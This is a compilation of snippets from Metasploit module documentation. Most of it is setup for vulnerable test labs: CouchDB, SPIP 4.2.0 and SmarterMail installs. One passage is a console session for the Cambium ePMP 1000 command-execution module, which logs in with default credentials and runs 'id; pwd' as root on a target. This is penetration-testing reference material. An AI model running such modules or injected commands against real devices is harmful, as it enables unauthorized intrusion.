systemctl start wftpserver.service SHELL config.vm.provider "virtualbox" do |vb| vb.memory = 512 vb.cpus = 1 end end ``` -------------------------------- ### Windows Setup: Download Installer Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/apache_couchdb_erlang_rce.md Provides the download link for the Apache CouchDB 2.3.1 MSI installer for Windows. ```bash https://archive.apache.org/dist/couchdb/binary/win/2.3.1/apache-couchdb-2.3.1.msi ``` -------------------------------- ### Download and Setup SPIP Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/spip_rce_form.md Instructions for downloading a vulnerable SPIP version and setting up a local instance on Ubuntu 20.04. ```bash wget https://files.spip.net/spip/archives/spip-v4.2.0.zip ``` ```bash mkdir spip-site cp spip-v4.2.0.zip spip-site/ cd spip-site / unzip spip-v4.2.0.zip ``` ```bash sudo apt install -y php-xml php-zip php-sqlite3 ``` ```bash php -S 127.0.0.1:8000 ``` -------------------------------- ### Example Scenario: Execute 'id; pwd' Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.md Demonstrates a full execution scenario, including setting RHOSTS, RPORT, CMD, and running the module. It shows successful login and command execution output. ```metasploit msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec msf auxiliary(epmp1000_get_chart_cmd_exec) > set rhosts 1.3.3.7 msf auxiliary(epmp1000_get_chart_cmd_exec) > set rport 80 msf auxiliary(epmp1000_get_chart_cmd_exec) > set CMD id; pwd msf auxiliary(epmp1000_get_chart_cmd_exec) > run [+] 1.3.3.7:80 - Running Cambium ePMP 1000 version 3.5... [*] 1.3.3.7:80 - Attempting to login... [+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "installer":"installer" [*] 1.3.3.7:80 - Executing id; pwd uid=0(root) gid=0(root) / [*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_ePMP_cmd_exec_12345.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` -------------------------------- ### SmarterMail Installation (Linux) Source: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/smartermail_guid_file_upload.md Installs SmarterMail on Ubuntu 22 using curl. Ensure curl and libicu are installed first. Follow the on-screen wizard to complete the setup. ```bash curl -O https://downloads.smartertools.com/smartermail/100.0.9406/smartermail_9406 \ && chmod +x smartermail_9406 \ && sudo ./smartermail_9406 install ```